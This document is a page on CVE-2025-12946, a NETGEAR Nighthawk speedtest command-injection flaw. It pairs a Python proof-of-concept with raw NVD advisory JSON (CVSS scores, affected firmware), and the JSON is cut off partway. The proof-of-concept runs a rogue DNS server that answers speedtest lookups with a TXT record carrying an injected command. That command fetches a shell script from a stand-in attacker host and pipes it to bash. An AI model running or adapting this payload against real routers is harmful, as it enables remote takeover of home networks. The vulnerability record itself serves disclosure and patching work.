CVE-2025-12946

#!/usr/bin/env python3 # CVE-2025-12946 PoC - NETGEAR Router Speedtest DNS Manipulation # This PoC demonstrates the DNS poisoning technique for speedtest command injection import struct import socket import threading class DNSPoisoner: def __init__(self, target_domain, injected_command): self.target_domain = target_domain self.injected_command = injected_command self.attacker_ip = "192.168.1.100" # Attacker controlled IP def craft_poisoned_response(self, query_data): """Craft DNS response with injected command in TXT record""" # DNS header: ID, flags, counts response = query_data[:2] # Transaction ID response += b'\x81\x80' # Flags: Standard response, no error response += query_data[4:6] + query_data[4:6] # Question count response += b'\x00\x00\x00\x00' # Answer, Authority, Additional counts # Original question section response += query_data[12:] # Answer section with malicious TXT record response += b'\xc0\x0c' # Pointer to question name response += b'\x00\x10' # Type: TXT response += b'\x00\x01' # Class: IN response += b'\x00\x00\x00\x3c' # TTL: 60 seconds # TXT record with injected command cmd_length = len(self.injected_command) response += struct.pack('>B', cmd_length) response += self.injected_command.encode() return response def start(self, port=53): """Start DNS poisoning server""" sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) sock.bind(('0.0.0.0', port)) print(f"[*] DNS Poisoner listening on port {port}") print(f"[*] Target domain: {self.target_domain}") print(f"[*] Injected command: {self.injected_command}") while True: try: data, addr = sock.recvfrom(512) if self.target_domain.encode() in data: print(f"[+] Intercepted DNS query for {self.target_domain}") poisoned_response = self.craft_poisoned_response(data) sock.sendto(poisoned_response, addr) print("[+] Sent poisoned DNS response") except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": # Configuration - customize based on target TARGET_DOMAIN = "speedtest.netgear.com" INJECTED_CMD = "; wget http://attacker.com/shell.sh | bash;" poisoner = DNSPoisoner(TARGET_DOMAIN, INJECTED_CMD) poisoner.start()

{"cve": {"id": "CVE-2025-12946", "sourceIdentifier": "a2826606-91e7-4eb6-899e-8484bd4575d5", "published": "2025-12-09T17:15:48.820", "lastModified": "2026-01-21T19:29:14.017", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability in the speedtest feature of affected NETGEAR Nighthawk routers, caused by improper input validation, can allow attackers on the router's WAN side, using attacker-in-the-middle techniques (MiTM) to manipulate DNS responses and execute commands when speedtests are run. \n\n\n\nThis issue affects RS700: through 1.0.7.82; RAX54Sv2 : before V1.1.6.36; RAX41v2: before V1.1.6.36; RAX50: before V1.2.14.114; RAXE500: before V1.2.14.114; RAX41: before V1.0.17.142; RAX43: before V1.0.17.142; RAX35v2: before V1.0.17.142; RAXE450: before V1.2.14.114; RAX43v2: before V1.1.6.36; RAX42: before V1.0.17.142; RAX45: before V1.0.17.142; RAX50v2: before V1.1.6.36; MR90: before V1.0.2.46; MS90: before V1.0.2.46; RAX42v2: before V1.1.6.36; RAX49S: before V1.1.6.36."}], "metrics": {"cvssMetricV40": [{"source": "a2826606-91e7-4eb6-899e-8484bd4575d5", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:H/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:N/AU:N/R:A/V:D/RE:M/U:Amber", "baseScore": 4.4, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT", "attackComplexity": "HIGH", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "UNREPORTED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NEGLIGIBLE", "Automatable": "NO", "Recovery": "AUTOMATIC", "valueDensity": "DIFFUSE", "vulnerabilityResponseEffort": "MODERATE", "providerUrgency": "AMBER"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}]}, "weaknesses": [{"source": "a2826606-91e7-4eb6-899e-8484bd4575d5", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:netgear:rs700_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.0.9.6", "matchCriteriaId": "C3AE8FD9-1FC9-4DF0-B22B-B482980EEDA8"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:netgear:rs700:-:*:*:*:*:*:*:*", "matchCriteriaId": "20BFC36A-1819-4878-A004-9851290B203F"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:netgear:rax54sv2_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.1.6.36", "matchCriteriaId": "83DB8165-F9DC-4086-91AF-9C4298FECBCC"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:netgear:rax54sv2:-:*:*:*:*:*:*:*", "matchCriteriaId": "B9FCC230-8A49-4C8C-BB53-DD703996F4DA"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:netgear:rax45v2_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.1.6.36", "matchCriteriaId": "5F6C69CA-30D0-4753-915B-9E5A15F10E2A"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:netgear:rax45v2:-:*:*:*:*:*:*:*", "matchCriteriaId": "AD5E8B48-66CB-4D9B-89C3-DA5F1A7B74F3"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:netgear:rax41v2_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.1.6.36", "matchCriteriaId": "BEC93BCF-E89C-49A9-9631-1666E6FF4E21"}]}, {"operator": "OR", "negate": fa ... (truncated)